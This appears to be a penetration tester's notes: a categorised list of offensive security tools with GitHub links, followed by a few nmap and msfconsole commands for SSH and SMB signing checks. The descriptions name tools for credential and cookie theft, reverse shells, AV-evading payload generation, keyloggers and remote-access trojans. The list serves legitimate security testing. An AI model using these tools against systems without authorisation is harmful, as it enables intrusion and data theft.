truffleHog - Searches through git repositories for high entropy strings - https://github.com/dxa4481/truffleHog
Altdns - Subdomain discovery - https://github.com/infosec-au/altdns
github-dorks - reveal sensitive personal and/or organizational information - https://github.com/techgaun/github-dorks
gitrob - find sensitive information - https://github.com/michenriksen/gitrob
Bluto - DNS Recon , Email Enumeration - https://github.com/darryllane/Bluto
SimplyEmail - Email recon - https://github.com/killswitch-GUI/SimplyEmail
Sublist3r - Fast subdomains enumeration tool for penetration testers  - https://github.com/aboul3la/Sublist3r
snitch - information gathering via dorks  - https://github.com/Smaash/snitch
RTA - scan all company's online facing assets - https://github.com/flipkart-incubator/RTA
InSpy - LinkedIn enumeration tool - https://github.com/gojhonny/InSpy
LinkedInt - LinkedIn scraper for reconnaissance - https://github.com/mdsecactivebreach/LinkedInt

Post-exploitation:
MailSniper - searching through email in a Microsoft Exchange  - https://github.com/dafthack/MailSniper
Windows-Exploit-Suggester - patch levels against vulnerability database - https://github.com/GDSSecurity/Windows-Exploit-Suggester
dnscat2-powershell - A Powershell client for dnscat2, an encrypted DNS command and control tool - https://github.com/lukebaggett/dnscat2-powershell
lazykatz - xtract credentials from remote targets protected with AV  - https://github.com/bhdresh/lazykatz
nps - Not PowerShell - https://github.com/Ben0xA/nps
Invoke-Vnc - Powershell VNC injector - https://github.com/artkond/Invoke-Vnc
spraywmi - mass spraying Unicorn PowerShell injection - https://github.com/trustedsec/spraywmi
redsnarf - for retrieving hashes and credentials from Windows workstations - https://github.com/nccgroup/redsnarf
HostRecon -  situational awareness - https://github.com/dafthack/HostRecon
mimipenguin - login password from the current linux user  - https://github.com/huntergregal/mimipenguin
rpivot - socks4 reverse proxy for penetration testing  - https://github.com/artkond/rpivot

Looting:
cookie_stealer - steal cookies from firefox cookies database -https://github.com/rash2kool/cookie_stealer
Wifi-Dumper - dump the wifi profiles and cleartext passwords of the connected access points - https://github.com/Viralmaniar/Wifi-Dumper
WebLogicPasswordDecryptor - decrypt WebLogic passwords - https://github.com/NetSPI/WebLogicPasswordDecryptor
jenkins-decrypt - Credentials dumper for Jenkins - https://github.com/tweksteen/jenkins-decrypt
mimikittenz -  ReadProcessMemory() in order to extract plain-text passwords - https://github.com/putterpanda/mimikittenz
LaZagne - Credentials recovery project - https://github.com/AlessandroZ/LaZagne
SessionGopher - extract  WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop - https://github.com/fireeye/SessionGopher
BrowserGather - Fileless web browser information extraction - https://github.com/sekirkity/BrowserGather
windows_sshagent_extract -  extract private keys from Windows 10's built in ssh-agent service - https://github.com/ropnop/windows_sshagent_extract

Network Hunting:
Sticky-Keys-Slayer - Scans for accessibility tools backdoors via RDP - https://github.com/linuz/Sticky-Keys-Slayer
DomainPasswordSpray -  password spray attack against users of a domain - https://github.com/dafthack/DomainPasswordSpray
BloodHound - reveal relationships within an Active Directory - https://github.com/adaptivethreat/BloodHound
APT2 - An Automated Penetration Testing Toolkit - https://github.com/MooseDojo/apt2
CredNinja -  identify if credentials are valid - https://github.com/Raikia/CredNinja
EyeWitness - take screenshots of websites - https://github.com/ChrisTruncer/EyeWitness
gowitness -  a golang, web screenshot utility - https://github.com/sensepost/gowitness
PowerUpSQL -  PowerShell Toolkit for Attacking SQL Server - https://github.com/NetSPI/PowerUpSQL
sparta - scanning and enumeration - https://github.com/SECFORCE/sparta
Sn1per - Automated Pentest Recon Scanner - https://github.com/1N3/Sn1per
PCredz - This tool extracts creds from a pcap file or from a live interface - https://github.com/lgandx/PCredz
ridrelay - Enumerate usernames on a domain where you have no creds - https://github.com/skorov/ridrelay

Wireless:
air-hammer - WPA Enterprise horizontal brute-force - https://github.com/Wh1t3Rh1n0/air-hammer
mana - toolkit for wifi rogue AP attacks - https://github.com/sensepost/mana
crEAP - Harvesting Users on Enterprise Wireless Networks - https://github.com/Shellntel/scripts
wifiphisher -  phishing attacks against Wi-Fi clients  - https://github.com/sophron/wifiphisher

Man in the Middle:
mitmproxy - An interactive TLS-capable intercepting HTTP proxy - https://github.com/mitmproxy/mitmproxy
bettercap - bettercap - https://github.com/evilsocket/bettercap
MITMf - Framework for Man-In-The-Middle attacks  - https://github.com/byt3bl33d3r/MITMf
Gifts/Responder - Responder for old python - https://github.com/Gifts/Responder
mitm6 - pwning IPv4 via IPv6  - https://github.com/fox-it/mitm6
shelljack - man-in-the-middle pseudoterminal injection - https://github.com/emptymonkey/shelljack

Physical:
Brutal - Payload for teensy - https://github.com/Screetsec/Brutal
poisontap - Exploits locked/password protected computers over USB - https://github.com/samyk/poisontap
OverThruster - HID attack payload generator for Arduinos - https://github.com/RedLectroid/OverThruster
Paensy - An attacker-oriented library for the Teensy 3.1 microcontroller - https://github.com/Ozuru/Paensy
Kautilya - Payloads for a Human Interface Device - https://github.com/samratashok/Kautilya

Payloads:
JavaReverseTCPShell - Spawns a reverse TCP shell in Java - https://github.com/quantumvm/JavaReverseTCPShell
splunk_shells - Splunk with reverse and bind shells - https://github.com/TBGSecurity/splunk_shells
pyshell - shellify Your HTTP Command Injection - https://github.com/praetorian-inc/pyshell
RobotsDisallowed - harvest of the Disallowed directories - https://github.com/danielmiessler/RobotsDisallowed
SecLists - collection of multiple types of lists - https://github.com/danielmiessler/SecLists
Probable-Wordlists - Wordlists sorted by probability - https://github.com/berzerk0/Probable-Wordlists
ARCANUS -  payload generator/handler.  - https://github.com/EgeBalci/ARCANUS
Winpayloads - Undetectable Windows Payload Generation  - https://github.com/nccgroup/Winpayloads
weevely3 - Weaponized web shell  - https://github.com/epinna/weevely3
fuzzdb - Dictionary of attack patterns - https://github.com/fuzzdb-project/fuzzdb
payloads - web attack payloads - https://github.com/foospidy/payloads
HERCULES - payload generator that can bypass antivirus - https://github.com/EgeBalci/HERCULES
Insanity-Framework - Generate Payloads - https://github.com/4w4k3/Insanity-Framework
Brosec -  An interactive reference tool for payloads - https://github.com/gabemarshall/Brosec
MacroShop - delivering payloads via Office Macros - https://github.com/khr0x40sh/MacroShop
Demiguise - HTA encryption tool - https://github.com/nccgroup/demiguise
ClickOnceGenerator - Quick Malicious ClickOnceGenerator - https://github.com/Mr-Un1k0d3r/ClickOnceGenerator
PayloadsAllTheThings -  A list of useful payloads - https://github.com/swisskyrepo/PayloadsAllTheThings


Apple:
MMeTokenDecrypt - Decrypts and extracts iCloud and MMe authorization tokens - https://github.com/manwhoami/MMeTokenDecrypt
OSXChromeDecrypt - Decrypt Google Chrome and Chromium Passwords on Mac OS X - https://github.com/manwhoami/OSXChromeDecrypt
EggShell - iOS and OS X Surveillance Tool - https://github.com/neoneggplant/EggShell
bonjour-browser - command line tool to browse for Bonjour - https://github.com/watson/bonjour-browser
logKext - open source keylogger for Mac OS X - https://github.com/SlEePlEs5/logKext
OSXAuditor - OS X computer forensics tool - https://github.com/jipegit/OSXAuditor
davegrohl -  Password Cracker for OS X - https://github.com/octomagon/davegrohl
chainbreaker - Mac OS X Keychain Forensic Tool - https://github.com/n0fate/chainbreaker
FiveOnceInYourLife - Local osx dialog box phishing - https://github.com/fuzzynop/FiveOnceInYourLife
ARD-Inspector - ecrypt the Apple Remote Desktop database - https://github.com/ygini/ARD-Inspector
keychaindump - reading OS X keychain passwords - https://github.com/juuso/keychaindump
Bella - python, post-exploitation, data mining tool - https://github.com/manwhoami/Bella
EvilOSX - pure python, post-exploitation, RAT - https://github.com/Marten4n6/EvilOSX

Captive Portals:
cpscam - Bypass captive portals by impersonating inactive users - https://github.com/codewatchorg/cpscam

Passwords:
pipal - password analyser - https://github.com/digininja/pipal
wordsmith - assist with creating tailored wordlists - https://github.com/skahwah/wordsmith

Obfuscation:
ObfuscatedEmpire -  fork of Empire with Invoke-Obfuscation integrated directly in - https://github.com/cobbr/ObfuscatedEmpire
obfuscate_launcher - Simple script for obfuscating payload launchers - https://github.com/jamcut/obfuscate_launcher
Invoke-CradleCrafter - Download Cradle Generator & Obfuscator - https://github.com/danielbohannon/Invoke-CradleCrafter
Invoke-Obfuscation - PowerShell Obfuscator - https://github.com/danielbohannon/Invoke-Obfuscation
nps_payload - payloads for basic intrusion detection avoidance - https://github.com/trustedsec/nps_payload

#ssh verification 
nmap --script ssh2-enum-algos -p22 1.1.1.1 -n -Pn
#log msfconsole
spool /root/.msf4/logs/console.log

#signing is not required on the smb server

nmap --script smb-security-mode.nse -p445 127.0.0.1
sudo nmap -sU -sS --script smb-security-mode.nse -p U:137,T:139 127.0.0.1